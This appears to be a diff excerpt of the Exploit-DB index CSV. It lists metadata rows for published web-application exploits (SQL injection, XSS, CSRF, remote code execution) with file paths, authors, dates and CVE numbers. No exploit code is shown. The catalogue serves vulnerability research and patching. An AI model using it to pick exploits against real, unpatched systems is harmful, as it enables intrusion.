51215,exploits/php/webapps/51215.txt,"Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23162,,,,,
51216,exploits/php/webapps/51216.txt,"Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23163,,,,,
34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php,,2010-09-01,2014-09-08,1,,,,,,https://www.securityfocus.com/bid/42923/info
52146,exploits/php/webapps/52146.py,"Artica Proxy 4.50 - Remote Code Execution (RCE)",2025-04-09,Madan,webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-2054,,,,,
43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,,2017-12-01,2017-12-01,0,CVE-2017-17055,,,,,
31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php,,2008-01-15,2014-01-19,1,CVE-2008-0286;OSVDB-40273,,,,,https://www.securityfocus.com/bid/27286/info
4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,webapps,php,,2007-07-23,,1,OSVDB-39107;CVE-2007-4007,,,,,
@ -15788,6 +15793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
52152,exploits/php/webapps/52152.NA,"ChurchCRM 5.9.1 - SQL Injection",2025-04-09,"Sanan Qasimzada",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39304,,,,,
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
@ -28677,6 +28683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,webapps,php,,2005-07-21,2013-06-08,1,,,,,,https://www.securityfocus.com/bid/14343/info
52153,exploits/php/webapps/52153.NA,"PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)",2025-04-09,"Vuln Seeker Cybersecurity Team",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-6244,,,,,
8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,webapps,php,,2009-02-09,2017-02-08,1,,,,,,
26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],webapps,php,,2005-11-26,2013-07-05,1,CVE-2005-3859;OSVDB-21137,,,,,https://www.securityfocus.com/bid/15576/info
16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",webapps,php,,2011-02-05,2011-02-05,1,,,,,,
@ -29037,6 +29044,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
52150,exploits/php/webapps/52150.NA,"ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)",2025-04-09,"Jeremia Geraldi Sihombing",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39143,,,,,
35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,
46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80,2019-01-28,2019-01-28,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80,2019-02-04,2019-02-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
@ -35043,6 +35051,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
52145,exploits/python/webapps/52145.py,"DocsGPT 0.12.0 - Remote Code Execution",2025-04-09,"Shreyas Malhotra",webapps,python,,2025-04-09,2025-04-09,1,CVE-2025-0868,,,,,
51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,

Can't render this file because it is too large.